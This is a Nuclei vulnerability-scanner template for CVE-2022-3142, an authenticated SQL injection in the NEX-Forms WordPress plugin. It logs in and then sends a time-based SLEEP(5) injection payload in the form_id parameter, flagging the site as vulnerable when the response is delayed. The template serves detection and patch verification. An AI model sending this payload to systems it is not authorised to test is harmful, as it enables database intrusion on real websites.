nuclei-templates/http/cves/2022/CVE-2022-3142.yaml

56 lines
2.1 KiB
YAML

id: CVE-2022-3142
info:
name: NEX-Forms Plugin < 7.9.7 - SQL Injection
author: r3Y3r53
severity: high
description: |
The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.
remediation: Fixed in version 7.9.7
reference:
- https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/
- https://www.exploit-db.com/exploits/51042
- https://nvd.nist.gov/vuln/detail/CVE-2022-3142
- http://packetstormsecurity.com/files/171477/WordPress-NEX-Forms-SQL-Injection.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-3142
cwe-id: CWE-89
epss-score: 0.00572
epss-percentile: 0.7545
cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: basixonline
product: nex-forms
framework: wordpress
publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/
tags: wpscan,packetstorm,cve,cve2022,wordpress,sqli,wp-plugin,wp,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 30s
GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)-- HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code_2 == 200'
- 'contains(body_2, "NEX-Forms")'
- 'contains(content_type_2, "text/html")'
condition: and
# digest: 4a0a0047304502205fb3efe88bf2da55ab31d1aecca8aacee346d5fb63b6375a040ebcfa5e568ec4022100f16773daf0c0621076dbfbebbb8253caa4129bbc413b952fba13a7bc225f32f3:922c64590222798bb761d5b6d8e72950